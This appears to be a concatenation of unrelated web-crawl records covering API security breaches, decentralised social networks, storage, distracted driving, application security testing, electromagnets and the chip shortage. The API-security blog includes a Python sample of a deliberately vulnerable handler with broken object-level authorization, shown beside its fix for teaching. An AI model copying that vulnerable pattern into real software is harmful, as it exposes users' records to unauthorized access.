A bulletproof platform or cloud infrastructure is still vulnerable to insecure APIs. Why? Because developers are using APIs to punch holes through your otherwise secure cloud network (and feeding data directly to the outside world). Those security holes are valuable to hackers and bad actors.
When things go wrong, the fines resulting from API-related breaches can be hefty. For example, British Airways was fined over $200 million in 2018. And with 90% of developers using APIs, these security risks are everywhere.
Let’s take a look at some prominent examples of API-related data breaches.
Industry Examples of API Data Breaches
1 – Twitter API Data Breach (2022)
In August of this year, Twitter announced that a hacker accessed 5.4 million of its user records. The official reason for the data breach was “a code change introduced by a developer.” After the data breach, the records appeared for sale on a hacking forum.
Unfortunately, most solutions on the market don’t understand application architecture and can’t flag dangerous code changes at release time. Instead, teams wait for a (virtual) bomb to explode before they know unsafe code is running in production.
Twitter API request/response exposed user IDs
2 – Peloton API Data Breach (2021)
A security researcher found an unauthenticated API in Peloton’s software that allowed unauthorized access to personal identification information (PII) data. The hack enabled users to look up anyone registered for a class.
Luckily for Peloton, this vulnerability was discovered by white hat hackers, so they avoided fines. The bad news is that Peloton stock decreased by 15% when the press release came out.
Peloton API response showing private account data
3 – Facebook API Data Breach (2021)
A security researcher found a bug that allowed Facebook users to create posts on other users’ accounts. The researcher found that he could bypass authorization checks when making “unlisted” (invisible) posts.
This API vulnerability also allowed bad actors to share the posts they created, allowing misinformation to spread from any user account.
Facebook paid out a $30,000 bug bounty for this vulnerability. That’s a massive win for them because they’ve previously been fined over $5 billion (that’s billion, with a B) for consumer privacy violations.
A Facebook POST request allows the creation of posts on other user accounts.
How to Handle API Sprawl
Can you answer a simple question, “How many APIs exist in your production environment today?”
To increase the stakes, do you know how many of those APIs access sensitive data (PII, PCI, or PHI)?
This issue plagues security teams at organizations of all sizes. In fact, according to Gartner, “By 2025, less than 50% of enterprise APIs will be managed, as explosive growth in APIs surpasses the capabilities of API management tools.”
Beyond management, asking security teams to explain each API’s architectural context (and potential business impact) is a Herculean task.
So, where should security teams start?
Common Mistakes in API Security
Whether you’re starting an API security program from scratch or improving your existing process, it’s essential to feel confident in these three areas:
- API Discovery & Inventory
- Secure the API infrastructure
- Continuous API Security Testing
Here are some common pitfalls to avoid:
Analyzing API traffic/requests leads to incomplete API discovery
Shadow APIs (APIs that exist in production but are unknown to the organization) are a common concern for security teams. These are APIs created by development teams that aren’t appearing in API inventory tools.
Unfortunately, many teams cannot create their API inventory directly from the code running in production. Instead, they generate their inventory by watching network traffic and API calls. And these shadow APIs are not being called frequently (or at all) – hence why they’re in the shadows.
When hackers finally discover shadow APIs, the consequences can be immense. If an access point is unmanaged, there’s a high likelihood that it’s vulnerable.
Security teams can’t only rely on WAF, API Gateways, or IAM
Developers are human, and mistakes happen.
API vulnerabilities result from a variety of errors, including:
- Unauthenticated APIs
- Unsecured or Hardcoded API keys
- Broken Object Level Authorization
- API Logic Flaws
- Excessive API Data Exposure
- Lack of API Encryption
Unfortunately, there isn’t a single tool capable of protecting companies from these vulnerabilities. So, while WAF, API gateway, and access management solutions are all critical, they can’t guarantee your applications are secure. API testing is crucial for detecting these errors.
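As a concrete illustration of one item from the vulnerability list above, here is a minimal Python sketch of Broken Object Level Authorization and its fix. The account store, handler names, and data values are all hypothetical, invented for illustration, and not taken from any real API.

```python
# Hypothetical records store, for illustration only.
ACCOUNTS = {
    1: {"owner": "alice", "ssn": "xxx-xx-1234"},
    2: {"owner": "bob",   "ssn": "xxx-xx-5678"},
}

def get_account_vulnerable(account_id, _session_user):
    # BOLA: the handler trusts the client-supplied ID and never checks
    # that the requester actually owns the object.
    return ACCOUNTS.get(account_id)

def get_account_fixed(account_id, session_user):
    # Object-level authorization: verify ownership before returning data.
    record = ACCOUNTS.get(account_id)
    if record is None or record["owner"] != session_user:
        return None  # would be a 403/404 response in a real API
    return record

# "alice" can read bob's record through the vulnerable handler...
assert get_account_vulnerable(2, "alice") is not None
# ...but not through the fixed one.
assert get_account_fixed(2, "alice") is None
```

The fix is a single ownership check, which is exactly why this class of bug is so easy to introduce and so hard to catch without testing for unintended access.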
API testing is incomplete and infrequent
Mature software teams are good at testing their code logic before release. The bad news is that, often, API validation looks for intended (rather than unintended) functionality.
It’s essential to expect the worst from both your North-South (outside) and East-West (inside) traffic. An API testing strategy that verifies no additional data can be extracted is crucial.
Furthermore, API testing should occur every time a code change affects them. If your security program only tests APIs during development, there’s a higher likelihood they will drift over time and become exploitable.
API Security Solutions on the Market
As API security occupies more real estate in tech professionals’ brains, it’s natural that solutions continue entering the market. Let’s look at some popular approaches.
API Discovery and Inventory
One popular approach to API discovery relies on a combination of developer diligence and runtime traffic. Combining OpenAPI (formerly Swagger) with an open source project, APIClarity provides an inventory of discoverable APIs, but it’s not guaranteed to capture all of them. There are also commercial solutions that monitor traffic to create an inventory.
An alternative API discovery solution increasing in popularity is analyzing the compiled code running in production. This approach ensures complete coverage of APIs but does not provide insights into user interactions.
API Threat Prevention
Just like a firewall on your operating system, it’s possible to intercept malicious traffic using a WAF (Web Application Firewall) and an API gateway. For this to be successful, it’s crucial to have a complete API inventory and an established API schema so your firewall behaves as expected.
Many vendors exist in this space, including specialty API security companies.
API Security Assessments and Scanning
API security assessments require sending incorrect or malicious requests to APIs to find bugs or problems. One popular open-source fuzzing solution is RESTler. Many ‘freemium’ and commercial tools are also available for API testing.
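To illustrate the fuzzing idea in miniature, the sketch below generates malformed variants of a valid JSON request body (oversized strings, missing fields, unexpected nulls). This is a naive, assumption-laden toy; tools such as RESTler automate this systematically from an API specification.

```python
import json

def fuzz_payloads(base):
    """Yield malformed variants of a valid JSON payload: oversized
    strings, missing fields, and unexpected nulls."""
    yield json.dumps(base)  # the valid baseline request body
    for key in base:
        oversized = dict(base)
        oversized[key] = "A" * 10_000  # oversized string
        yield json.dumps(oversized)
        missing = dict(base)
        del missing[key]               # missing required field
        yield json.dumps(missing)
        nulled = dict(base)
        nulled[key] = None             # unexpected null
        yield json.dumps(nulled)

payloads = list(fuzz_payloads({"user_id": 42, "email": "a@b.co"}))
print(len(payloads))  # 7: one baseline plus three variants per field
```

Each payload would be sent to the API under test, with any 5xx response or unexpected data in the reply flagged as a finding.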
As API-driven software continues to expand, protecting sensitive data becomes increasingly crucial. Maturity in API security requires a complete inventory of APIs, followed by infrastructure that supports secure API data flows, and an automated test program.
If you’d like to learn more about ensuring you have a complete inventory of your APIs in production, book a demo with Bionic. | <urn:uuid:831128e6-83b3-4ff3-aa91-1a2df4f00a8a> | CC-MAIN-2022-40 | https://bionic.ai/blog/api-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00088.warc.gz | en | 0.902077 | 1,645 | 2.875 | 3 |
We live in an age where we fear isolation. The one string which connects us with the rest of the world is social media. With people being constantly on the move, social networking websites provide the most accessible and affordable medium for news and entertainment. The widespread popularity of social media, and the vague regulations in place, have allowed several media giants to rise. Companies such as Facebook, Twitter and LinkedIn are the big wigs who dominate and monopolize the social networking industry.
What’s more, these organisations have access to unbelievably large amounts of data, and with every passing day more of it is uploaded and shared on social media channels. They monetize this information by selling it to advertising and marketing companies to create targeted campaigns, which is not new information.
However, these social media giants have not only dominated the industry, they have also set the norms and frameworks for social media websites. For example, the servers which host a website fall under one authority, i.e. the creating (and owning) organisation. Moreover, the source code for the website is closed and inaccessible to anyone but the relevant personnel of the company. They control every single aspect of the website. And the most troubling aspect of this model is the amount of control these organizations have over the content shared on their feeds. The companies have complete authority to censor information as well as promote certain content.
But after a series of data leak scares over the recent years, people are questioning the methods in which these monolith organisations operate. And are looking for alternatives which better facilitate the users’ basic internet rights.
One of those alternatives is a decentralised /distributed social network (DSN) or a federated social network.
The idea of DSNs cropped up as a response to the blatant (and sometimes unethical) data mining which many social media networks undertake. The concept gained further visibility when cryptocurrencies gained popularity. Today, millions of people are active users of at least one DSN. And while that may not compare to the billions of mainstream social media users, it is still a considerably big user base. Some of the more popular DSNs today are Mastodon, Diaspora*, Sphere, Obsidian and Steemit.
A DSN works on a very different ideology to mainstream social networking websites. Most of them follow three basic principles – data security, privacy and transparency. Unlike Facebook and Twitter, DSNs are hosted on multiple servers owned by different people. And since these websites are usually open sourced, anyone can download the code and tweak it to create their own network. Or improve the existing one. So, instead of operating on a mediated private server, DSNs work based on peer-to-peer interaction.
Moreover, most DSNs offer encrypted messaging services and the option of anonymity to their users. In fact, some DSNs do not ask for proof of identification, like a phone number, while signing up. Strong advocates of this alternative form of social networking emphasize that this allows users to be completely in control of their own profiles and the content shared on them. They can control what they see, what to show and who to show the content to. Websites like Mastodon also refuse to host paid advertising on their platforms, so users get to see genuine content instead of sponsored campaigns. On the other hand, websites like Steemit and Sphere allow users to monetize their content by utilizing the concept of cryptocurrency, or ‘tokens’.
However, while the idea of DSNs is a good one, it is not a fool-proof method to combat mainstream social media. There are still several challenges and disadvantages to using a DSN account.
The most obvious challenge is attracting a permanent user base. Despite the existing user count being more than a million, DSNs are still relatively unheard of. People prefer to use mainstream social media like Facebook and Twitter because they are super easy to use. DSNs, on the other hand, can be difficult for new users to navigate.
Moreover, not everyone is interested to host a web server on their computer. And this further drives the average internet user away from signing up on a DSN.
Another serious challenge which creators of DSNs face is security, whether they agree or not. The fact of the matter is that most DSNs do not ask for real-world identity proofs; instead they rely on public key cryptography to enforce security for their user accounts. However, this is extremely difficult to manage. Not to mention, the basic issues that plague social media, like fake accounts, unreliable information sources, fake news, echo chambers and filter bubbles, persist.
In conclusion, the concept of DSNs is very promising. The intention of its creators to change the internet back into an open, free web is noble. And it is good to know that there are alternatives to Facebook and Twitter. However, a lot remains to be done before a DSN can be considered a fool-proof replacement for mainstream social media sites.
So, which one will you choose? Mainstream social media, or a decentralised one? | <urn:uuid:d2ad0734-662f-4f65-8601-daba77fa501a> | CC-MAIN-2022-40 | https://www.crayondata.com/decentralized-social-networks-the-choice-is-yours/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00088.warc.gz | en | 0.944106 | 1,053 | 2.765625 | 3 |
Data Management Glossary
High Performance Storage
High performance storage is a type of storage management system designed for moving large files and large amounts of data around a network. High performance storage is especially valuable for moving around large amounts of complex data or unstructured data like large video files across the network.
Used with both direct-connected and network-attached storage, high performance storage supports data transfer rates greater than one gigabyte per second and is designed for enterprises handling large quantities of data – in the petabyte range.
High performance storage supports a variety of methods for accessing and creating data, including FTP, parallel FTP, VFS (Linux), as well as a robust client API with support for parallel I/O.
High performance storage is useful for managing hot or active data, but can be very expensive for cold/inactive data. Since 60 to 90% of the data in an organization is typically inactive/cold within months of creation, that data should be moved off high performance storage to get the best storage TCO without sacrificing performance.
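As a rough illustration of the hot/cold tiering policy described above, the sketch below classifies data by last-access age. The 90-day threshold is an assumed policy value, not an industry standard, and a real data management system would also weigh file size, access frequency, and cost per tier.

```python
import time

def storage_tier(last_access_epoch, now_epoch, cold_after_days=90):
    """Classify data as 'hot' or 'cold' by last-access age.
    The 90-day default is an assumed policy, not a standard."""
    age_days = (now_epoch - last_access_epoch) / 86400
    return "cold" if age_days >= cold_after_days else "hot"

now = time.time()
print(storage_tier(now - 10 * 86400, now))   # hot: accessed 10 days ago
print(storage_tier(now - 120 * 86400, now))  # cold: idle for 120 days
```

Files classified as cold would then be candidates for migration off high performance storage to a cheaper tier.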
An analysis of driver behavior data found that drivers are growing more distracted by their devices.
Drivers are 10 percent more distracted now than last year, a problem driven largely by smartphones, according to new research from Zendrive, a company that collects and analyzes data on driver behaviors.
“Out from under the shadows, phone addicts have positioned themselves as public enemy number one, replacing drunk drivers as the ultimate threat on the road," says the 2019 distracted driving study, released this week.
The study analyzed driving data from 1.8 million anonymized drivers over 92 days, for a total of 4.5 billion miles. All data comes from smartphone sensors, which detect phone usage “when the driver handles the phone for a certain period of time for various purposes such as talking, texting, or navigating.” Researchers also spoke to 500 drivers to obtain details on how they use phones while driving, including which apps were most commonly tapped by people behind the wheel.
The results found that “phone addicts”—broadly defined as people who are unable or unwilling to put away their phones while driving—pick up their phones four times more than the average driver, use their phone six times longer and have their eyes off the road 28 percent of the time. And their numbers are increasing—the number of “hardcore phone addicts” identified by the company doubled from last year.
“Today, one in 12 drivers on the road is a phone addict,” the report says. “If these trends continue, as many as one in every five drivers could be in the phone addict category by 2022.”
Drivers distracted by their phones may already be more dangerous than drunk drivers. In 2016, the National Highway Traffic Safety Administration reported 10,497 deaths as a result of drunk driving, and 3,450 deaths from distracted drivers. But fatalities caused by driver phone use are more difficult to track and likely underreported, according to the report.
“Drivers failing to admit they were distracted prior to a crash and inconsistencies in police reports make it difficult to arrive at an accurate number,” it says. “But there are other reasons to believe mobile phones are deadlier than NHTSA suggests.”
For example, roughly 660,000 drivers use their cell phones while driving, according to NHTSA data. Last year, Zendrive data showed “that the problem was 100 times worse than reported by the government’s dataset. Over 69 million people use their phones at least once in awhile behind the wheel.”
And those people are driving day and night, the report notes, while drunk drivers are most active between midnight and 3 a.m. That means “that both in number and in timing, distracted drivers are a bigger danger than drunk drivers.”
Distracted driving increased in each state, but Virginia was the “most distracted” on the list. Residents there spend an average of 9.45 percent of their time behind the wheel on their phones. Montana (9.14 percent), New Hampshire (9), Georgia (8.69) and Mississippi (8.63) round out the top five. By contrast, the least distracted states are Pennsylvania (6.47 percent), New York (6.74), Oregon (6.83), South Carolina (6.89) and South Dakota (7.03).
The most commonly used apps while driving are music and phone apps, edging out social media and texting. State laws and municipal regulations that ban the use of handheld devices entirely while driving could help the problem, the report concludes.
“While 47 states (including the District of Columbia) ban text messaging, talking on a handheld phone while driving is only banned in 16 states nationwide,” it says. “Although texting laws are a huge step forward, immediate and aggressive action needs to be taken against handheld phone use. We believe enforcing handheld bans can make a positive impact on states across the board next year.” | <urn:uuid:57d4c9f0-d7f5-4f39-b263-d03fef8d3166> | CC-MAIN-2022-40 | https://www.nextgov.com/cxo-briefing/2019/04/phone-addicts-are-new-drunk-drivers-report-says/156291/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00088.warc.gz | en | 0.966632 | 823 | 2.609375 | 3 |
Two powerful yet relatively new technologies in application security testing are Interactive Application Security Testing (IAST), and Software Composition Analysis (SCA). IAST solutions are designed to help organizations identify and manage security risks associated with vulnerabilities discovered in running web applications using dynamic testing (aka runtime testing) techniques.
SCA, a term coined by market analysts, describes an automated process to identify open source components in a codebase. Once a component is identified it becomes possible to map that component to known security disclosures and determine whether multiple versions are present within an application. SCA also helps identify whether the age of the component might present maintenance issues. While not strictly a security consideration, SCA also facilitates legal compliance related to those open source components.
The Need for Integrated IAST and SCA
According to the 2018 Verizon Data Breach Investigations Report, web application attacks still remain the most common vector for data breaches. Web applications are the attack surface of choice for hackers attempting to get access to sensitive IP/data and personal data, such as usernames and passwords, credit card numbers, and patient information. Organizations need to ensure that the web applications they develop are secure, ideally before they are deployed in production, and developers need to be able to perform quick fixes when critical vulnerabilities are discovered.
Web applications are seldom composed exclusively of proprietary code. In fact, the converse is usually true, with open source code components ubiquitous in both commercial and internal applications. The 2018 Open Source Security and Risk Analysis (OSSRA) report published by the Synopsys Center for Open Source Research & Innovation found open source components in 96% of 1,100 applications scanned, with an average 257 components per application. Because organizations are often unaware of how much—or even what—open source they’re using, they can inadvertently provide attackers with a target-rich environment when vulnerabilities in open source components are disclosed. Seventy-eight percent of the codebases examined for the OSSRA report contained at least one open source vulnerability, with an average 64 vulnerabilities per codebase.
While development and security teams often use SAST (static application security testing) and SCA solutions to identify security weaknesses and vulnerabilities in their web applications, detection of many vulnerabilities is only possible by dynamically testing the running application, which led to the development of dynamic application security testing (DAST) tools. Despite similarities to traditional DAST and penetration testing tools, IAST is superior to both in finding vulnerabilities earlier in the SDLC—when it is easier, faster, and cheaper to fix them. Over time, IAST is likely to displace DAST usage for two reasons: IAST provides significant advantages by returning vulnerability information and remediation guidance rapidly and early in the SDLC, and it can be integrated more easily into CI/CD and DevOps workflows.
Shifting Left in the SDLC
IAST generally takes place during the test/QA stage of the software development life cycle (SDLC). With IAST effectively shifting testing left, problems can be caught earlier in the development cycle, reducing remediation costs and release delays. The latest-generation IAST tools return results as soon as changed code is recompiled and the running app retested. By focusing testing on a narrow set of changes, developers can quickly identify vulnerabilities even earlier in the development process.
IAST does analysis from within applications and has access to application code, runtime control and dataflow information, memory and stack trace information, network requests and responses, and libraries, frameworks, and other components (via integration with an SCA tool). The analysis allows developers to not only pinpoint the source of an identified vulnerability but also to address it quickly.
What to Look for in an IAST tool
IAST tools are dependent upon their ability to instrument code, which means their capabilities are dependent upon the application’s programming language. You’ll want to select an IAST tool that can perform code reviews of applications written in the programming languages you use and that is compatible with the underlying framework used by your software. Obviously, it should deploy quickly and easily, with seamless integration into CI/CD workflows. Compatibility with any type of test method—existing automation tests, manual QA/dev tests, automated web crawlers, unit testing, etc. is another feature to look for.
The best IAST tools provide DevOps teams with the ability to both identify security vulnerabilities and also inform as to whether that vulnerability can be exploited. Any modern IAST tool should include web APIs that enable DevOps leads to integrate testing into continuous integration builds like those using Jenkins. Native integration with defect management tools like Atlassian Jira provides for streamlined defect management workflow.
With the prevalence of open source code in today’s software, effective IAST tools need to be aware of the open source composition of the applications being tested. Open source compositional analysis is the responsibility of an SCA tool. This requires the SCA tool to have a deep understanding of open source development paradigms and produce a comprehensive inventory for the open source dependencies regardless of how the dependency is linked into the application.
Understanding whether an open source vulnerability is exploitable within a given application requires an understanding of whether the vulnerable component is present, how an exploit of the vulnerability operates, and an understanding of how the application uses the component. Only a combination of top-tier IAST and SCA tools can effectively identify this class of software risk and guide developers to resolution. An integrated IAST and SCA solution helps development teams build more secure software, minimize risks while maximizing their speed and productivity, and improve the quality of their software.
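The core matching step of SCA can be sketched in a few lines: compare an application's declared dependencies against a feed of known disclosures. The feed below is a tiny hypothetical stand-in; a real SCA tool pulls from sources such as the NVD and vendor advisories, and also detects transitive and statically linked dependencies that never appear in a manifest.

```python
# Tiny illustrative vulnerability feed. The two entries are real,
# publicly documented CVEs, but a production feed has thousands.
KNOWN_VULNS = {
    ("log4j-core", "2.14.1"): ["CVE-2021-44228"],
    ("jackson-databind", "2.9.8"): ["CVE-2019-12384"],
}

def scan_dependencies(deps):
    """Map declared (name, version) dependencies to known disclosures,
    the core matching step of software composition analysis."""
    return {
        (name, version): KNOWN_VULNS[(name, version)]
        for name, version in deps
        if (name, version) in KNOWN_VULNS
    }

report = scan_dependencies([("log4j-core", "2.14.1"), ("guava", "31.0")])
print(report)
```

Whether a flagged component is actually exploitable in context is the question the integrated IAST side answers: the SCA match says the vulnerable code is present, while runtime analysis shows whether the application exercises it.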
Tim Mackey, Technical Evangelist at Synopsys
Electromagnets can be made much more powerful than permanent magnets. In addition, the strength of the electromagnet can be easily controlled from zero to maximum by controlling the current flowing through the coil. For these reasons, electromagnets have many more practical applications than do permanent magnets.
One of the most graphic examples of a working electromagnet is the one for cranes that are used to move scrap iron. The crane electromagnet shown in Figure 1 is a big block of soft iron that is magnetized by an electric current flowing through a coil.
This type of electromagnet has the capability of lifting heavy loads of magnetic scrap metal. Lift-and-drop control is easily accomplished by the connection and disconnection of voltage to the electromagnet.
Figure 1 Crane electromagnet.
A solenoid is an electromagnet with a movable iron core or plunger. Upon applying power or energizing the coil, the magnetic field that is produced pulls or pushes the plunger into the coil, as illustrated in Figure 2.
Whenever power is applied to the coil, the plunger is magnetically attracted into the stator as it slides along a nylon surface in a linear fashion. By attaching a nonferrous push rod to the plunger, a pushing or pulling motion can be accomplished.
Figure 2 Solenoid.
Solenoid valves are the most frequently used device to control liquid or gas flow. A solenoid valve has two main parts: the solenoid and the valve. Figure 3 shows a typical solenoid valve. One inlet and one outlet are used to permit and shut off fluid flow. A spring is used to hold the valve closed when the solenoid coil is de-energized. When the coil is energized, the magnetic field created pulls the plunger upward to open the valve, permitting liquid flow from inlet to outlet.
Figure 3 Solenoid valve.
Most home heating/cooling system thermostats operate on low-voltage (typically 24 volts AC) control circuits. The source of the 24-volt AC power is a control transformer installed as part of the heating/cooling equipment.
The advantage of the low-voltage control system is the ability to operate system load devices using inherently safe voltage and current levels.
Transformers are electrical devices that are used to raise or lower AC voltages. Figure 4 is a typical step-down control transformer. The transformer uses two electromagnetic coils to transform or change the AC input voltage level.
An input voltage of 120 VAC is applied to the primary coil wound around an iron core. An output voltage of 24 VAC emerges from a secondary coil also wound around the core.
The AC voltage input current produces a magnetic field that continually varies in magnitude. The core transfers this field to the secondary coil where it induces an output voltage. The change in voltage depends on the ratio of turns in the primary and secondary coils.
Figure 4 Step-down control transformer.
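The turns-ratio relationship can be put into numbers. The ideal-transformer equation Vs = Vp × (Ns / Np) is standard; the specific turn counts below are assumed for illustration, and real transformers have small losses this model ignores.

```python
def secondary_voltage(v_primary, n_primary, n_secondary):
    """Ideal transformer relationship: Vs = Vp * (Ns / Np).
    Losses are ignored, so real output is slightly lower."""
    return v_primary * n_secondary / n_primary

# A 5:1 turns ratio (assumed here as 500 primary turns, 100 secondary
# turns) steps 120 VAC down to the 24 VAC control level.
print(secondary_voltage(120.0, 500, 100))  # 24.0
```

The same relationship run in reverse (more secondary turns than primary) gives a step-up transformer, which is how transmission voltages are raised near the generating station.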
Electricity is generated at a comparatively low voltage. In order to transport this energy great distances, the voltage has to be increased, or stepped up, to values as high as 765,000 volts. This is accomplished through the use of large step-up transformers located near the generating station and provides an efficient and economical method of transmission. A series of transformers then step-down the voltage to levels that are safe in businesses and residences.
An electromagnetic control relay is a switch that is operated by an electromagnet. The relay generates electromagnetic force when input voltage is applied to the coil. The electromagnetic force moves the armature that switches the contacts.
A relay is made up of two circuits: the coil input or control circuit and the contact output or load circuit, as illustrated in Figure 5. Relays are used to control small loads of 15 A or less, which include solenoids, pilot lights, alarms, and small fan motors.
Figure 5 Electromagnetic control relay.
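The two-circuit idea can be sketched as a toy model, assuming one normally-open and one normally-closed contact; real relays come in many contact arrangements, and this sketch ignores electrical details like pull-in voltage and contact ratings.

```python
class Relay:
    """Toy model of an electromagnetic control relay: a low-power coil
    (control) circuit switches a separate contact (load) circuit."""

    def __init__(self):
        self.coil_energized = False

    def apply_coil_voltage(self, on):
        self.coil_energized = on

    @property
    def no_contact_closed(self):
        # Normally-open contact: closes only while the coil is energized.
        return self.coil_energized

    @property
    def nc_contact_closed(self):
        # Normally-closed contact: opens while the coil is energized.
        return not self.coil_energized


relay = Relay()
print(relay.no_contact_closed, relay.nc_contact_closed)  # False True
relay.apply_coil_voltage(True)
print(relay.no_contact_closed, relay.nc_contact_closed)  # True False
```

The key point the model captures is isolation: the coil circuit and the contact circuit share no electrical connection, so a small control signal can safely switch a larger load.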
An electric generator is a machine that uses magnetism to convert mechanical energy into electric energy. Generators can be subdivided into two major categories depending on whether the electric current produced is alternating current (AC) or direct current (DC).
The basic principle on which both types of generator work is the same, although the details of construction of the two may differ somewhat.
The generator principle states that a voltage is induced in a conductor whenever the conductor is moved through a magnetic field so as to cut lines of force. Figure 6 illustrates the generator principle and relationships between the direction the conductor is moving, the direction of the magnetic field, and the resultant direction of the induced current flow.
Figure 6 Generator principle.
In its basic form the AC generator consists of a magnetic field, an armature, slip rings, and brushes. For most applications the magnetic field is created by an electromagnet, but for the simple generator shown in Figure 7, permanent magnets are used.
The armature is rotated through the magnetic field and may contain any number of conductors wound in loops. As the armature is rotated, a voltage is generated in the single loop conductor which causes current to flow. Slip rings are attached to the armature and rotate with it. Carbon brushes ride against the slip rings and conduct the current from the armature to the output load.
Figure 7 Basic AC generator.
As the armature is rotated through one complete revolution, an AC sine wave voltage is produced, as illustrated in Figure 8. This generated voltage varies in both voltage value and polarity as follows:
- At 0 degrees the coil is moving parallel to the magnetic field. It cuts no lines of force, so no voltage is generated.
- When the coil rotates from 0 to 90 degrees, it cuts more and more lines of flux. As the lines of flux are cut, voltage is generated in the positive direction and reaches a maximum value at 90 degrees.
- As the coil continues to rotate from 90 to 180 degrees, it cuts fewer and fewer lines of flux. Therefore, the voltage generated goes from maximum back to zero.
- When the coil continues to rotate past 180 to 270 degrees, each side of the coil moves through the magnetic field in the opposite direction. More and more lines of flux are cut, and a voltage is generated in the negative direction, reaching a maximum value at 270 degrees.
- As the coil continues to rotate from 270 to 360 degrees, it cuts fewer and fewer lines of flux. Therefore, the voltage generated goes from maximum back to zero.
Figure 8 Generation of an AC sine wave voltage.
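The angle-by-angle behavior listed above follows the standard relation v = Vmax × sin(θ). The sketch below evaluates it at the same angles; the 100 V peak is an assumed value chosen only for illustration.

```python
import math

def generated_voltage(v_max, angle_deg):
    """Instantaneous loop voltage: v = Vmax * sin(theta)."""
    return v_max * math.sin(math.radians(angle_deg))

# Evaluate at the angles discussed above (assumed 100 V peak).
for angle in (0, 90, 180, 270, 360):
    v = generated_voltage(100.0, angle)
    print(f"{angle:3d} deg -> {v:+.1f} V")
```

The output traces one full sine cycle: zero at 0 and 180 degrees, positive maximum at 90 degrees, and negative maximum at 270 degrees, matching the rotation described in the bullet list.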
Electric motors are used to convert electric energy into mechanical energy. Motors use magnetism and electric currents to operate. There are two basic categories of motors, AC (Figure 9) and DC. Both use the same fundamental parts but with variations to allow them to operate from two different kinds of electric power supply, alternating current or direct current.
Figure 9 AC electric motor.
The operation of an electric motor depends upon the interaction of two magnetic fields. Whenever a conductor carrying current is placed in a magnetic field, it will experience a force which tends to push it out of the magnetic field. The right-hand rule for motors (Figure 10) indicates the direction that a current-carrying conductor will be moved in a magnetic field.
When the forefinger is pointed in the direction of the magnetic lines of force, and the center finger in the direction of the current flow in the conductor, the thumb will point in the direction that the conductor will move.
Figure 10 Current-carrying conductor in a magnetic field.
If the conductor is bent in the form of a loop, current flows in one direction on one side of the loop and in the opposite direction on the other. As a result the two sides of the coil experience forces in opposite directions, as illustrated in Figure 11. The pair of forces with equal magnitude but acting in opposite directions causes the loop to rotate around its axis, developing motor torque.
The overall turning force on the armature loop depends on several factors, including field strength and the amount of current flow through the loop. In the practical motor, if the motor does not develop enough torque to pull its load, it stalls.
Figure 11 Developing motor torque.
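In quantitative terms, the force on a straight conductor at right angles to the field is F = B × I × L. A brief Python sketch (the flux density, current, and conductor length are illustrative assumptions) shows that doubling the current doubles the force, which is why motor torque rises with both field strength and loop current:

```python
def conductor_force(b_tesla, current_amps, length_m):
    """Force on a straight conductor at right angles to a magnetic
    field: F = B * I * L, in newtons."""
    return b_tesla * current_amps * length_m

# 0.5 T field, 0.2 m conductor: doubling the current doubles the force.
print(conductor_force(0.5, 10.0, 0.2))  # 1.0 N
print(conductor_force(0.5, 20.0, 0.2))  # 2.0 N
```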
- List two advantages that electromagnets have over permanent magnets for many practical applications.
- Explain how the lift-and-drop control of a crane-operated lifting magnet is accomplished.
- Explain how solenoids operate.
- Explain how solenoid valves operate.
- In the operation of a transformer, what determines the change in voltage between the primary and secondary coils?
- Explain how an electromagnetic control relay operates.
- State the principle of operation of a generator.
- In the operation of an AC generator, the output voltage varies in both value and polarity.
  - (a) What causes the output voltage to vary in value?
  - (b) What causes the output voltage to vary in polarity?
- Compare the function of electric generators and motors.
- What is the basis for the operation of an electric motor?
- Describe the two methods used to create electromagnetic induction.
- When does mutual inductance between two coils occur?
- Which side of a transformer is designated as the primary and what side as the secondary?
- Electromagnets can be made much more powerful and the strength of the electromagnet can be easily controlled.
- By connecting and disconnecting the voltage applied to the electromagnet's coil.
- Applying power to the coil produces a magnetic field that pulls or pushes the plunger into the coil.
- When the coil is energized the magnetic field created pulls the plunger upwards to open the valve permitting liquid flow from inlet to outlet. When the solenoid coil is de-energized a spring closes the valve.
- The ratio of the turns in the primary and secondary coils.
- The relay generates electromagnetic force when input voltage is applied to the coil. The electromagnetic force moves the armature that switches the contacts.
- The generator principle states that: a voltage is induced in a conductor whenever the conductor is moved through a magnetic field so as to cut lines of force.
- (a) The value of the output voltage in an AC generator varies with the number of lines of flux being cut. (b) The polarity of the output voltage reverses when the direction in which each side of the coil moves through the magnetic field reverses.
- An electric generator is a machine that uses magnetism to convert mechanical energy into electrical energy. Electric motors are used to convert electric energy into mechanical energy.
- Whenever a conductor carrying current is placed in a magnetic field, it will experience a force which tends to push it out of the magnetic field.
- By motion of a conductor across a stationary magnetic field, and by motion of a magnetic field across a stationary conductor.
- When the two coils are magnetically linked together by a common magnetic flux.
- The primary is the side connected to the AC power input and the secondary is the side connected to the output. | <urn:uuid:0993624d-25ae-4e6b-b117-3a9d375537b3> | CC-MAIN-2022-40 | https://electricala2z.com/electrical-circuits/uses-for-electromagnets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00088.warc.gz | en | 0.909828 | 2,312 | 3.734375 | 4 |
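The transformer relationship in the answers above (the voltage change is determined by the turns ratio of the two coils) can be checked with a quick calculation. The supply voltage and turn counts below are arbitrary illustrative values:

```python
def secondary_voltage(v_primary, n_primary, n_secondary):
    """Ideal transformer: Vs / Vp = Ns / Np, so Vs = Vp * Ns / Np."""
    return v_primary * n_secondary / n_primary

# Step-down: 120 V across 500 primary turns, 50 secondary turns.
print(secondary_voltage(120.0, 500, 50))    # 12.0
# Step-up: same supply with 1000 secondary turns.
print(secondary_voltage(120.0, 500, 1000))  # 240.0
```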
The global shortage of microchips is severely impacting the automotive market with no fast or easy resolution within sight. While this supply chain disruption has evoked the attention of world leaders, legislators, and industry experts, the problem persists. Simply put, there aren’t enough chips to meet demand. Some short-term tactics may help contain losses for stakeholders, but most lessons learned require long-term changes in strategy and supply chain planning. Fortunately, putting advanced technology in place can help significantly mitigate the impact of similar supply chain disruptions in the future.
How bad is the current chip shortage?
